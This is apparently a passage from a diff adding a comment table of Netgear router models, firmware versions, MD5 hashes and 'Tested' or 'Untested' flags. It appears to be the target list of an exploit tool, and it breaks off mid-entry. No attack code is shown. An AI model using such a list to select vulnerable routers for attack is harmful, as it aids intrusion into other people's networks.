+# R7100LG V1.0.0.28_1.0.6 11f8dd187ef5b5bab4976d9292d129fc Untested
+# R7100LG V1.0.0.24_1.0.6 26732e7cac019aadb0513625017f384a Untested
+# R7300 V1.0.0.74_1.0.29 505ed4f38c41eee6d44f7689f50be393 Untested
+# R7300 V1.0.0.70_1.0.25 ae3e7269a0b9d57c970341bcb0429542 Untested
+# R7300 V1.0.0.68_1.0.24 2bcde5639accf598265b7177d782476d Untested
+# R7300 V1.0.0.62_1.0.21 0fe64444a5449fbc047200473f0f9403 Untested
+# R7300 V1.0.0.60_1.0.20 13d0cabc4464b992e1df78eef6f3961f Untested
+# R7300 V1.0.0.56_1.0.18 ebbbdf612c711973bbf8794c44a95970 Untested
+# R7300 V1.0.0.54_1.0.17 5aa834b74be6bf16397c791c80c15146 Untested
+# R7300 V1.0.0.52_1.0.16 95419377446f8733fa675c890ec5f894 Untested
+# R7300 V1.0.0.46_1.0.13 7628870b9f553a2e10768f69756a581d Untested
+# R7300 V1.0.0.44_1.0.12 83b93e33bfc09a30668aa0fdd23e2854 Untested
+# R7300 V1.0.0.32_1.0.6 fcef0ba19d673f34ccef4dc91dc4fa05 Untested
+# R7300 V1.0.0.26_1.0.6
92cff1f3477af90d8596377839e2eec5 Untested +# R7850 V1.0.5.48_10.0.4 086770d1439357f850a3112ae8819141 Untested +# R7850 V1.0.4.46_10.0.2 0b0d439985567721303ce85429f9f1fb Untested +# R7850 V1.0.4.42_10.0.1 7154f14e8e52992364b9a46454280843 Untested +# R7900 V1.0.4.22_10.0.44 3068215ef9fae0f5b91f423cf298b551 Untested +# R7900 V1.0.3.18_10.0.42 b9648a3331fe0bc714086aa465407027 Untested +# R7900 V1.0.3.10_10.0.38 9f36b5152658c5fab9524a1d5aca196c Untested +# R7900 V1.0.3.8_10.0.37 f7f345699b491db79d7ce2b13c838941 Untested +# R7900 V1.0.2.16_10.0.32 6ea7c6925906967070fbb149a66a4f06 Untested +# R7900 V1.0.2.10_10.0.29 644585c5d3509fe14d52387e1a8bb7c8 Untested +# R7900 V1.0.1.26_10.0.23 2ce02ded670becb1ddf5f23c883d81ee Untested +# R7900 V1.0.1.18_10.0.20 6f9af2c3b682c45793dcf06788603160 Untested +# R7900 V1.0.1.12_10.0.17 44a17c8063f2750fb13bb47bc3cd570c Untested +# R7900 V1.0.1.8_10.0.14 66c1cbf908e9d665ac80aaf2a03c4d8f Untested +# R7900 V1.0.1.4_10.0.12 6d1186a3d281608fc83936e6c5961145 Untested +# R7900 V1.0.0.10_10.0.7 46ec7fc4c5cdb9c093ff3bfdb4c8075d Untested +# R7900 V1.0.0.8_10.0.5 72b987220f836ba90ba96fc8f3c3e6b8 Untested +# R7900 V1.0.0.6_10.0.4 255ef90a187d7faf01afa62aa2e16844 Untested +# R7900 V1.0.0.2_10.0.1 7b6bd468b060ac4fb17084c20898caa4 Untested +# R8000 V1.0.4.46_10.1.63 da80add1588ea779156ec23b58421a0e Untested +# R8000 V1.0.4.28_10.1.54 a93e7d1ca961c5d381c1c93b8f85168b Untested +# R8000 V1.0.4.18_10.1.49 45d86327a2dbbad50f65d04480bb91fd Untested +# R8000 V1.0.4.12_10.1.46 917d43c1bf1805db4d52ed37d360340f Untested +# R8000 V1.0.4.4_1.1.42 bb306a4634a9f38ef6b44bfb699c64d7 Untested +# R8000 V1.0.4.2_1.1.41 a3ec0994398d09e774fa4f149eece45b Untested +# R8000 V1.0.3.54_1.1.37 e2e236432b7e215af3d410d3fd1e3777 Untested +# R8000 V1.0.3.48_1.1.33 8bf3b8f6e1ee371975a1811174a5fe87 Untested +# R8000 V1.0.3.46_1.1.32 9020713be39ebf9c232ffc0efb02c8fe Untested +# R8000 V1.0.3.36_1.1.25 533e646304c2afa4f626f7f4c7aa404c Untested +# R8000 V1.0.3.32_1.1.21 
02dcbb51aea55ff912a28a24f6b9f78b Untested +# R8000 V1.0.3.26_1.1.18 e13536f8d86441eae991067c25d8e22f Untested +# R8000 V1.0.3.4_1.1.2 6de885748d6d20f6b5d8fce7112e8563 Untested +# R8000 V1.0.2.46_1.0.97 5b6484ebe4dc70c4f6e3e2068d999efb Untested +# R8000 V1.0.2.44_1.0.96 6f83c53910438a665cb1077dbcd3365e Untested +# R8000 V1.0.1.16_1.0.74 7d670355315b039002a8cbbb80420b4f Untested +# R8000 V1.0.0.110_1.0.70 ef0078e8e19027cdf9ea19de0c933042 Untested +# R8000 V1.0.0.108_1.0.62 6b3476409b804505b6d50ad6bc7b1225 Untested +# R8000 V1.0.0.102_1.0.45 a01fcda6b67f06fe4c8c89beea8a1346 Untested +# R8000 V1.0.0.100_1.0.44 49c84460fe2f2c8acde4c2a5e644b1c8 Untested +# R8000 V1.0.0.90_1.0.39 3f1ec00fbd5b17bb494a7a7b407b0c4e Untested +# R8000 V1.0.0.76_1.0.32 0d13323ba9174c355b892f5fdc8ad1f4 Untested +# R8000 V1.0.0.74_1.0.31 2ba89ed0267f17111410325af7443e9c Untested +# R8000 V1.0.0.68_1.0.27 444b9d3c9f7c4fd57b88adcc204e5786 Untested +# R8000 V1.0.0.46_1.0.17 00a3ca9d640835bc1522bf778316d085 Untested +# R8300 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Tested +# R8300 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Tested +# R8300 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8300 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8300 V1.0.2.106_1.0.85 e07b4ac548845360376351088bdbe025 Untested +# R8300 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8300 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8300 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8300 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8300 V1.0.2.48_1.0.52 e851c828e338b0877257dd1944f48f95 Untested +# R8500 V1.0.2.130_1.0.99 6e66d0f53dabb26b63b3c51c60e31d29 Untested +# R8500 V1.0.2.128_1.0.97 a1976abe6cfe426c82fd3e77910ae833 Untested +# R8500 V1.0.2.122_1.0.94 9158cf385252ea8803c593a61c25d6b4 Untested +# R8500 V1.0.2.116_1.0.90 379b3d60f766f148f6edd781207021a4 Untested +# R8500 V1.0.2.106_1.0.85 
e07b4ac548845360376351088bdbe025 Untested +# R8500 V1.0.2.100_1.0.82 aee8499b7a27150255651be82f68d292 Untested +# R8500 V1.0.2.94_1.0.79 bcfbef70672ec7f5eb191eb362d91827 Untested +# R8500 V1.0.2.86_1.0.75 de6b48ac7b27dbe36b3ab787dfda3c69 Untested +# R8500 V1.0.2.80_1.0.71 fc1acfbaeebc1f377b44597371b0d250 Untested +# R8500 V1.0.2.64_1.0.62 5b4523865713dac322bd857130609ad2 Untested +# R8500 V1.0.2.54_1.0.56 24f96de9380f9de69e12f89d4fa75819 Untested +# R8500 V1.0.2.30_1.0.43 86b0d0a568ac5c96a76caff6fd58aa61 Untested +# R8500 V1.0.2.26_1.0.41 db2cb85f4ebe32a00ed0f363857296bc Untested +# R8500 V1.0.0.56_1.0.28 7ce6e1dc960c18753db2d1e485b89b06 Untested +# R8500 V1.0.0.52_1.0.26 3e38a40d46ab92e4051c75485d1905c2 Untested +# R8500 V1.0.0.42_1.0.23 46bede5c9402a454eb1ae575e7a360e4 Untested +# R8500 V1.0.0.28_1.0.15 94090fe2e24ba7306a2f31633adc9fe7 Tested +# RS400 V1.5.0.34_10.0.33 06d0d64069c01a8097cd872749976d05 Untested +# WGR614v8 V1.2.10_21.0.52 614f89302975403d496b4a0b518aea8a Untested +# WGR614v8 V1.2.10_21.0.52NA 101384d94d7952a544fa2e62ca73e109 Untested +# WGR614v8 V1.1.24_14.0.43 f43f802a97701767f8fa09f1eb0618c6 Untested +# WGR614v8 V1.1.24_14.0.43NA 95a6f676f56eac0bb8b1eebbd07218ac Untested +# WGR614v8 V1.1.2_1.0.23 071d4113f52c9b21b3c910bb28bacb7d Untested +# WGR614v8 V1.1.2_1.0.23NA bd2fb25f2771d63615a8f3b97c969a0e Untested +# WGR614v8 V1.1.11_6.0.36 607bb6c99bf0133f0d01fa514801b849 Untested +# WGR614v8 V1.1.11_6.0.36NA 241628d09640f984584744fb017683c3 Untested +# WGR614v8 V1.1.1_1.0.20NA b6eb6eae0124e9cd22d61adcc38c999a Untested +# WGR614v8 V1.1.20_7.0.37 a3c36fcddb7655a94363cc3b7918496a Untested +# WGR614v8 V1.1.20_7.0.37NA ed0152c3f9cb8bd31c9c166e20cafc4b Untested +# WGR614v9 V1.2.32_43.0.46 fa1c55ad1567fd849ef751d291b892de Untested +# WGR614v9 V1.2.32_43.0.46NA 365476604a6a3d41ea175f10c3dde764 Tested +# WGR614v9 V1.2.30_41.0.44 7118b22c86f91adc51bcf1cb1d6adf6c Untested +# WGR614v9 V1.2.30_41.0.44NA 5aa4fb6075c995ac8ed73872785c78ce Untested +# WGR614v9 
V1.2.24_37.0.35 5b911dfea21d8db82724810e2a9158bd Untested +# WGR614v9 V1.2.24_37.0.35NA 82e743338a1e9ef765dc4b3e37fafd9d Untested +# WGR614v9 V1.2.6_18.0.17 62d24aa8be617fd336dea0debb655ae1 Untested +# WGR614v9 V1.2.6_18.0.17NA 523084eb4010f48a0e707a4028a1fe1d Untested +# WGR614v9 V1.2.2_14.0.13 e6a2dbc9c94544c7eed21b237ccfd24f Untested +# WGR614v9 V1.2.2_14.0.13NA 2d8d6c91da01e286af941d53b0941cd8 Untested +# WGR614v9 V1.0.18_8.0.9PT 64676efe72f6af307b828271e6204fc2 Untested +# WGR614v9 V1.0.18_8.0.9NA c2ef52172f626dd54516748218fd86fc Untested +# WGR614v9 V1.0.15_4.0.3 77789a77994b2401784b1401d73d0b9d Untested +# WGR614v9 V1.0.15_4.0.3NA 7a8e000d8d49c9e59c4b1679017a34b2 Untested +# WGR614v9 V1.0.9_1.0.1NA f254181ba5f01c3a995d2196ae14ee80 Untested +# WGR614v10 V1.0.2.66_60.0.90 3ba19173b642c36ab3101c2eba76cffe Untested +# WGR614v10 V1.0.2.66_60.0.90NA 0f59b6e38db90d94d2d13b768a3220a9 Tested +# WGR614v10 V1.0.2.60_60.0.85 1d60611c5c1625d080f3e10e610c2d5f Untested +# WGR614v10 V1.0.2.60_60.0.85NA a025c0436b77becfe914b232bf52ef25 Untested +# WGR614v10 V1.0.2.58_60.0.84NA f80a3eb6d9210cb0de2198779f497193 Untested +# WGR614v10 V1.0.2.54_60.0.82 ab7a9cc1b054ab8ca2109437f3496f52 Untested +# WGR614v10 V1.0.2.54_60.0.82NA 2a458ba9762df0e91aeb7c38d3eb7e23 Untested +# WGR614v10 V1.0.2.26_51.0.59 40d158ee9d77db8630f6404e11ae03f9 Untested +# WGR614v10 V1.0.2.26_51.0.59NA 2e31d2fd814b3bdfe3b0e3f20843d1b9 Untested +# WGR614v10 V1.0.2.18_47.0.52 73aab18a9fc0035ff8c65d444cab5549 Untested +# WGR614v10 V1.0.2.18_47.0.52NA d4d624d349e6f7da73043d71f44a57d5 Untested +# WGT624v4 V2.0.13_2.0.15NA 80fefa297112135ddd81cf1f60f3c751 Tested +# WGT624v4 V2.0.13_2.0.14 cb4f0a9fc4135b33a9cf560c95c97f51 Untested +# WGT624v4 V2.0.13_2.0.14NA f5b5be2c84b1aef8ca53df5fceab272e Untested +# WGT624v4 V2.0.12_2.0.12 fed810d3dc976e06588e6876f96f9259 Untested +# WGT624v4 V2.0.12_2.0.12NA 60a3a0f205a5716818dbdf1975fbb07b Tested +# WGT624v4 V2.0.6_2.0.6NA f96fbceb5289a65edd92f978ee706339 Untested +# WN2500RP 
V1.0.0.30_1.0.58 07465158c20dba3b49c79d2ad1b9c84a Untested +# WN2500RP V1.0.0.26_1.0.54 96bd8cfd11a618e5a55bd022428782c9 Untested +# WN2500RP V1.0.0.24_1.0.53 242e4d920ff5df57c9d65a238c29ce37 Untested +# WN2500RPv2 V1.0.1.54_1.0.68 14b91d65bae2129cc4b899e720e75703 Untested +# WN2500RPv2 V1.0.1.50_1.0.64 8b0791af9666590e58209fd7e5a16b27 Untested +# WN2500RPv2 V1.0.1.46_1.0.60 b5114bc628d4e9edc10196270d583177 Untested +# WN2500RPv2 V1.0.1.42_1.0.56 44a31a9fb0bedf6c005091ad494f5351 Untested +# WN2500RPv2 V1.0.0.30_1.0.41 80ef4b999eca686146b0b04e6d669373 Untested +# WN3000RP V1.0.2.64_1.1.86 cb7f3d886a25dc7eb9f986beb54db84a Tested +# WN3000RP V1.0.1.36_1.1.47 df4292954de76be0f27025b9d13ce6bb Untested +# WN3000RP V1.0.1.34_1.1.46 71f56fc6e8094749302f527fe82289a2 Untested +# WN3000RP V1.0.1.18_1.1.24 a1c3820bdca75d04162dd7861fb2f86d Tested +# WN3000RP V1.0.0.12_1.0.12 e06626090bdae6ce66cf75ff03808a5e Untested +# WN3100RP V1.0.0.20_1.0.22 7fdba1a377186b9e1998672c2648d79d Untested +# WN3100RP V1.0.0.16_1.0.20 35d8cde0380d205a7fdca505667d85b4 Untested +# WN3100RP V1.0.0.14_1.0.19 ae21c356da1b984b489b8aabce19de7b Untested +# WN3100RP V1.0.0.6_1.0.12 f731689ad01cc5505e3891e6919c5a05 Untested +# WN3500RP V1.0.0.22_1.0.62 c1674d36c57a5de7933135d59383974e Untested +# WN3500RP V1.0.0.20_1.0.60 65d7a5a699c75333693b2cd396034937 Untested +# WN3500RP V1.0.0.18_1.0.59 83df1d146445eb58d09e445cb3249894 Untested +# WN3500RP V1.0.0.16_1.0.58 0bbedd6843907c8fbb64770e8b57ac2d Untested +# WN3500RP V1.0.0.14_1.0.54 7cc46c62a531db3dc0fd4780c0f82838 Untested +# WN3500RP V1.0.0.12_1.0.49 d6d3eb3f36fa4c2a041903bf7d6fd169 Untested +# WNCE3001 V1.0.0.50_1.0.35 059ad6dcebb82e6651096da7a08fc78d Untested +# WNCE3001 V1.0.0.46_1.0.33 94f01f14cf494c5149f6d7beaa9296d7 Untested +# WNCE3001 V1.0.0.44_1.0.32 4bbca14fd0f41a8c5cd6871a128e46ac Untested +# WNCE3001 V1.0.0.38 619dc850fe460613aaa2c6df53c419d2 Untested +# WNDR3300 V1.0.45_1.0.45 03d3251057856d6cac4769ab86b066bf Tested +# WNDR3300 V1.0.45_1.0.45NA 
5d07e4a0ea0a970e89f9396aa62dd607 Tested +# WNDR3300 V1.0.29_1.0.29 602f96a6fae5e8d7f4309f4d8e08188d Untested +# WNDR3300 V1.0.29_1.0.29NA d6f3cf64ce4af186d4e32b4e6452faf2 Untested +# WNDR3300 V1.0.27_1.0.27NA 8ec2a57bb32cfc0f037972e7e4de7faf Untested +# WNDR3300 V1.0.26_1.0.26 3de6162f831de47f58d9f5333e55b7ab Untested +# WNDR3300 V1.0.26_1.0.26NA 748179fe0a96b58999b3a159c3e31723 Untested +# WNDR3300 V1.0.23_1.0.23NA 3bb5461c1170a5753dfffc3f640acc2b Untested +# WNDR3300 V1.0.14 cf637815959405a86d006e2ba1bcfb8d Untested +# WNDR3300 V1.0.14NA 3d2ac9332328b0c256e3c733c98f6a52 Tested +# WNDR3300v2 V1.0.0.26_11.0.26NA e835e1eee653616ba95499f599b78e5b Untested +# WNDR3400 V1.0.0.52_20.0.60 80de163495cc5e58b2c2ff897eec5fd6 Tested +# WNDR3400 V1.0.0.50_20.0.59 d11430ae71dbae949d2eb2a9630ccf1a Untested +# WNDR3400 V1.0.0.38_16.0.48 b8c40a4c5186a3db9ce2a9099147e693 Tested +# WNDR3400 V1.0.0.34_15.0.42 040b5ffe8176b9c42d96b2099f9b4ce0 Untested +# WNDR3400v2 V1.0.0.54_1.0.82 9c021309e2c4091fc57df0353e75b549 Tested +# WNDR3400v2 V1.0.0.52_1.0.81 727e32bd4cb10e0b24d9766fe9a227df Untested +# WNDR3400v2 V1.0.0.38_1.0.61 c8e6e4c539f61b3e3eb6ca0539a68858 Untested +# WNDR3400v2 V1.0.0.34_1.0.52 a88e95d61d2d7ff00009cb1120e85fe5 Untested +# WNDR3400v2 V1.0.0.16_1.0.34 6e2f0190e121d60c8ff14a3fbe1f13f1 Tested +# WNDR3400v2 V1.0.0.12_1.0.30 b5b34647f8f8d3ba34e7eb5d9c972135 Untested +# WNDR3400v3 V1.0.1.24_1.0.67 2be19432190609d6bfb02d6c1c47ee75 Tested +# WNDR3400v3 V1.0.1.22_1.0.66 c077e49ec59fc692b030198bf495e3ae Untested +# WNDR3400v3 V1.0.1.18_1.0.63 21bf9c98c100bda9f3c1426c0ac08b8e Untested +# WNDR3400v3 V1.0.1.16_1.0.62 c5df186763e4635396ae951b655dd071 Untested +# WNDR3400v3 V1.0.1.14_1.0.61 7e3e4b4e1d52fbcd7d5e5843f09f0a68 Untested +# WNDR3400v3 V1.0.1.12_1.0.58 41ce43703a3ebae82b57b67bb40c5d82 Untested +# WNDR3400v3 V1.0.1.8_1.0.56 4f5b23803637f7217bd04af851956296 Untested +# WNDR3400v3 V1.0.1.4_1.0.52 1ecf5ef5969f669596c25844eef9d493 Untested +# WNDR3400v3 V1.0.1.2_1.0.51 
d5e10eb60169468672f64b018b5de076 Untested +# WNDR3400v3 V1.0.0.48_1.0.48 3a34943e3bb1ca6e1aba397b411f4b8e Untested +# WNDR3400v3 V1.0.0.46_1.0.45 eabecab2f26341257506074a68545c2b Untested +# WNDR3400v3 V1.0.0.38_1.0.40 72e5fd96a04f49a20be668bb0c5f0730 Tested +# WNDR3400v3 V1.0.0.22_1.0.29 a04349703393acb4fa8ca8aea84fa623 Untested +# WNDR3400v3 V1.0.0.20_1.0.28 469df29ef44a9df192be7f19d1480330 Untested +# WNDR3700v3 V1.0.0.42_1.0.33 58e4777d185a193780db166db21d5a04 Tested +# WNDR3700v3 V1.0.0.38_1.0.31 7ba5ac026b6f6682dac17a5ce954a96c Tested +# WNDR3700v3 V1.0.0.36_1.0.30 74ee38f55aedd22b1eab1dbf40b11386 Untested +# WNDR3700v3 V1.0.0.30_1.0.27 82441ed888457dcdd73dec464ded0fdc Untested +# WNDR3700v3 V1.0.0.22_1.0.17 82c000f2875fcf4124ec520a49abb16b Untested +# WNDR3700v3 V1.0.0.18_1.0.14 11b537851e5429908b1d6ba720db2869 Tested +# WNDR4000 V1.0.2.10_9.1.89 acecc4d245b1d3ac2a9863a26578f150 Tested +# WNDR4000 V1.0.2.6_9.1.87 fe27305c1bcf41d76ed261aefb28c3bc Untested +# WNDR4000 V1.0.2.4_9.1.86 fd0b612d1d38adb9e06b34f71d32c02f Tested +# WNDR4000 V1.0.2.2_9.1.84 db0094ac915fdc03f939d8e322a90ab7 Untested +# WNDR4000 V1.0.0.94_9.1.81 0f5429b29cd3e891e79674989aec023c Untested +# WNDR4000 V1.0.0.90_9.1.79 3fa15f5a61b941a2c0135af3e515c5e8 Untested +# WNDR4000 V1.0.0.88_9.1.77 7abf69863995397c54b425ca80b30b53 Untested +# WNDR4000 V1.0.0.82_8.0.71 5523a6ff5e7b9e09ce13390c55afe218 Tested +# WNDR4000 V1.0.0.66_8.0.55 36a4947d7073786d72f455d757361db6 Untested +# WNDR4500 V1.0.1.46_1.0.76 84574e9f9fe95c604448052edb4d8d87 Untested +# WNDR4500 V1.0.1.40_1.0.68 dc85b49521a1c363c73bf1ebe8c73ba0 Untested +# WNDR4500 V1.0.1.38_1.0.64 2c740bb2e8475e8265d03896eca8fc25 Untested +# WNDR4500 V1.0.1.36_1.0.63 2c7bf148fd493ea4def07e6c1cc23303 Untested +# WNDR4500 V1.0.1.20_1.0.40 5455b061ee711044c5486590cca00ff0 Untested +# WNDR4500 V1.0.1.18_1.0.36 379ff2bad24e59f83198417a7bcd733c Untested +# WNDR4500 V1.0.1.6_1.0.24 30e3aa7b3fab44e518a336d74bfa453e Untested +# WNDR4500 V1.0.0.58_1.0.13 
bdb781e3112fa9ffe30d16117ecd701d Untested +# WNDR4500 V1.0.0.50_1.0.12 0162e056eb5d34da63ff8e6d4d73f5a0 Untested +# WNDR4500 V1.0.0.40_1.0.10 48a3028c2e06d22fee5161fba04b260d Untested +# WNDR4500v2 V1.0.0.72_1.0.45 c5f20d0f2cee57993508c0418392e0f3 Tested +# WNDR4500v2 V1.0.0.68_1.0.42 af43fabb4e9ff2e2318d2a36417bd978 Untested +# WNDR4500v2 V1.0.0.64_1.0.40 1d7bc84bb31f20ceaa573e36be1b0857 Untested +# WNDR4500v2 V1.0.0.62_1.0.39 4134d640352f4d577f6185f4c0ebfb4a Untested +# WNDR4500v2 V1.0.0.60_1.0.38 d24a33895a62e79a4f78055520319e45 Tested +# WNDR4500v2 V1.0.0.56_1.0.36 1220bf91d071f907ad2642b550268b9b Untested +# WNDR4500v2 V1.0.0.54_1.0.33 4b1967613a61bc6c2120069ba68a1d5b Untested +# WNDR4500v2 V1.0.0.50_1.0.30 15f6b8ea1aba81531f1c53f68519946f Untested +# WNDR4500v2 V1.0.0.42_1.0.25 544ccf81ef326f62455bdac3159cfc83 Untested +# WNDR4500v2 V1.0.0.36_1.0.21 34ef5af300ef8a2c4528f29a5075610a Untested +# WNDR4500v2 V1.0.0.26_1.0.16 fb9ff113df712a183d6346c620ee87cd Untested +# WNR834Bv2 V2.1.13_2.1.13 2d6331f57ce223c595602c0a90926b0e Untested +# WNR834Bv2 V2.1.13_2.1.13NA c42048a86d1f24036fc03d065381809e Tested +# WNR834Bv2 V2.0.8_2.0.8 6dc2d3a927cee46b2ef538d3ee6d54d9 Untested +# WNR834Bv2 V2.0.8_2.0.8NA f146e01301d76991b6fdc8230ad5fb15 Untested +# WNR834Bv2 V1.0.32_1.0.32 2529e65416073a7ec0f414314517bcea Untested +# WNR834Bv2 V1.0.32_1.0.32NA a7a8fc6ae466ec8cc90dda8253fba107 Untested +# WNR1000v3 V1.0.2.72_60.0.96 d411870b5481c7cd0eb562910ef2c073 Untested +# WNR1000v3 V1.0.2.72_60.0.96NA 295e02ba735bd0af037559d774b9a2db Tested +# WNR1000v3 V1.0.2.68_60.0.93 ff97e01e443cc81bb30f03fc0efe5308 Untested +# WNR1000v3 V1.0.2.68_60.0.93NA 7ba59824dc432a51a535087b0d3ac81e Untested +# WNR1000v3 V1.0.2.62_60.0.87 29f0ec7ed9a0ce791646d81093d0c8e3 Untested +# WNR1000v3 V1.0.2.62_60.0.87NA 245b31c66e707af407846dca4b9b7a8e Untested +# WNR1000v3 V1.0.2.60_60.0.86WW fe9d4fb399ba44f717a2939cd17072ce Untested +# WNR1000v3 V1.0.2.60_60.0.86NA 9cfaf1947bc6d5745faee53495293ff7 Untested +# 
WNR1000v3 V1.0.2.54_60.0.82 1e268e025b02efcc0bb06c2b4625628b Untested +# WNR1000v3 V1.0.2.54_60.0.82NA 6e10842a669a29f1bfdd76473123d690 Untested +# WNR1000v3 V1.0.2.28_52.0.60 420a11918e1f453f021e230d73406fb6 Untested +# WNR1000v3 V1.0.2.28_52.0.60NA 509a52eb9a78f1ff769b0f0c84ad2b9d Untested +# WNR1000v3 V1.0.2.26_51.0.59 8767f575ddfbd4665d7dd05e42faf079 Untested +# WNR1000v3 V1.0.2.26_51.0.59NA 6692853b230f3af1b690671a27bd059f Untested +# WNR1000v3 V1.0.2.18_47.0.52 1e40904ed44bf26bbfeecbd2c0dec4fe Untested +# WNR1000v3 V1.0.2.18_47.0.52NA f6dafa4be552fe2a5753281a2f80c5ec Untested +# WNR1000v3 V1.0.2.4_39.0.39 ef2240e32d1c7d76ca541c0d329d5a7d Untested +# WNR2000v2 V1.2.0.8_36.0.60 777527ae69d32f5cd0fda49d9987c176 Tested +# WNR2000v2 V1.2.0.8_36.0.60NA 542ecd9c806cbbf4916e01bb89eeb5a8 Untested +# WNR2000v2 V1.2.0.6_36.0.58 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.6_36.0.58NA 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.4_35.0.57 1e628de1f92428df23cd55dfd223c068 Untested +# WNR2000v2 V1.2.0.4_35.0.57NA 6d1f447d9d84a86f9a08b46f506ff1d9 Tested +# WNR2000v2 V1.0.0.40_32.0.54 043e419fd8c05607ec9e5b4482c95f13 Tested +# WNR2000v2 V1.0.0.40_32.0.54NA 6b55ee8f255f57414338ee05282bdca9 Untested +# WNR2000v2 V1.0.0.35_29.0.47 715eb802324b205e7f56a85d43665f7f Untested +# WNR2000v2 V1.0.0.34_29.0.45 51eaa4d099f0cdb46f633564f62f8497 Untested +# WNR2000v2 V1.0.0.34_29.0.45NA 577a2e81d0dd7d34bee9c63819538f76 Untested +# WNR3500 V1.0.36_8.0.36NA d860aaf29860050a007e633b89664974 Tested +# WNR3500 V1.0.30_8.0.30 1f848e4d7e6703048cf0181824fb609b Untested +# WNR3500 V1.0.29_8.0.29NA 3c1fdb2291946a0a926807695c12628c Untested +# WNR3500 V1.0.22_6.0.22 d8a129dfaea562433cf80be956300b2f Untested +# WNR3500 V1.0.22_6.0.22NA 45a17326c49ac43bcb6b18afb3c0b5f5 Untested +# WNR3500 V1.0.15_1.0.15NA e070997c460f44ab988a04a0efce13bb Untested +# WNR3500 V1.0.10_1.0.10NA 5977786564b864cbf4e42cdd797616ba Untested +# WNR3500v2 V1.2.2.28_25.0.85 
e8693f52138f70fa9ada17e963a6afb4 Untested +# WNR3500v2 V1.2.2.28_25.0.85NA bf5336cceb49ac9bb9448e53147f869c Untested +# WNR3500v2 V1.0.2.14_24.0.74 6b443549f93556df02d9e1d9f93b3ce2 Untested +# WNR3500v2 V1.0.2.14_24.0.74NA 386f51b17623cbc359fc3135baf40b0a Untested +# WNR3500v2 V1.0.2.10_23.0.70 46436291f6c3e3d27648d595fef53ae7 Untested +# WNR3500v2 V1.0.2.10_23.0.70NA 3e5c2fc4a6466b601da6187868d93da1 Untested +# WNR3500v2 V1.0.0.64_11.0.51 d0c84ea109ab5acd924a3e89adf530f0 Untested +# WNR3500v2 V1.0.0.64_11.0.51NA 139e55982a1b17e078172bd4f9396abd Untested +# WNR3500L V1.2.2.48_35.0.55NA 94a53de4ee1a4157072b96bedaec92af Tested +# WNR3500L V1.2.2.44_35.0.53 c22b8c6b14d29a9e5610b1db5f516dfb Untested +# WNR3500L V1.2.2.44_35.0.53NA 5e37f509dfa90a0d50532d5a8f58e0e7 Tested +# WNR3500L V1.2.2.40_34.0.48 e5ddafb1962c69c5fed3c7a107bb8f6f Untested +# WNR3500L V1.2.2.40_34.0.48NA 72b02a418f587ff453cf4fd22aff9220 Untested +# WNR3500L V1.2.2.30_34.0.37 70d568a9b4a5a7691d2efc8197fdf7c5 Untested +# WNR3500L V1.2.2.30_34.0.37NA 5a6bd3069dc06833bf48eedd9394404e Untested +# WNR3500L V1.0.2.50_31.1.25 e9931e6dc7e2bd65f8b62609c108439b Tested +# WNR3500L V1.0.2.50_31.1.25NA fe186aa9a4636ad1a5914337f6ca7abf Untested +# WNR3500L V1.0.2.26_30.0.98 517b93770badf97ffec0b86bfda4f023 Untested +# WNR3500L V1.0.2.26_30.0.98NA 27f4a60eccc9d5a444b889abb8711870 Untested +# WNR3500L V1.0.0.88_13.0.76 0df99aa41a37b89bca3b987a89cc8d94 Untested +# WNR3500L V1.0.0.88_13.0.76NA c56d6ec2595a35dc42fb069df34d2446 Untested +# WNR3500L V1.0.0.86_13.0.75 c3408d55c826743cf772599c54b0bf18 Untested +# WNR3500L V1.0.0.86_13.0.75NA 58f6b918e96bd9a55cfa18a3358690cd Untested +# WNR3500Lv2 V1.2.0.56_50.0.96 8ce62e097cc3d1872c7e8d7d08c63ce4 Tested +# WNR3500Lv2 V1.2.0.54_50.0.94 b350794ce4fec6ccf730b811a676bf3d Untested +# WNR3500Lv2 V1.2.0.50_50.0.90 71de09faa64e5a4d6c78a476b57c8f77 Untested +# WNR3500Lv2 V1.2.0.48_40.0.88 78d236e8d0f23db2e2c9645bdfd308ee Untested +# WNR3500Lv2 V1.2.0.46_40.0.86 
603d5ce196612709fcd8122b8a09cdaa Untested +# WNR3500Lv2 V1.2.0.44_40.0.84 c745ed78281129c513d5d96471c2f250 Untested +# WNR3500Lv2 V1.2.0.40_40.0.80 d6de6022ff9381fb354c68008858c5ab Untested +# WNR3500Lv2 V1.2.0.38_40.0.78 902b6264511eb4067c8f37c3d2405d38 Untested +# WNR3500Lv2 V1.2.0.34_40.0.75 e5b431877b953c9d5699003af3f5dc8d Untested +# WNR3500Lv2 V1.2.0.32_40.0.74 5d8f4bd2d847ec1f6274546dea54ce02 Untested +# WNR3500Lv2 V1.2.0.28_40.0.72 582fb44d1d46856fdd7168ad4e37514a Untested +# WNR3500Lv2 V1.2.0.26_40.0.71 adbd30a2e76dfb0676f21ff7afcbb76e Untested +# WNR3500Lv2 V1.2.0.20_40.0.68 05f2658e63f0f8e7b32e1c8d945f6834 Untested +# WNR3500Lv2 V1.2.0.18_40.0.67 3a35d7237573c8e21c048dfcc0715039 Untested +# WNR3500Lv2 V1.2.0.16_40.0.66 6b65c8d0cba353d655abc311caa28741 Untested +# WNR3500Lv2 V1.0.0.14_37.0.50 29dba756cc53cbaab1ec11c3a509f0a2 Untested +# WNR3500Lv2 V1.0.0.10 af2d51ddebe58e58aad5309b63eb6c45 Untested +# XR300 V1.0.3.38_10.3.30 e0b2fc5b04cd98e794df05ebac65e596 Untested +# XR300 V1.0.3.34_10.3.27 7e20864385587876e149b9b745568f39 Untested +# XR300 V1.0.3.26_10.3.22 69f1ce725f125e266a27c9419cdb82cc Untested +# XR300 V1.0.2.24_10.3.21 ab533f222aa912f02550ffb59379b728 Untested +# XR300 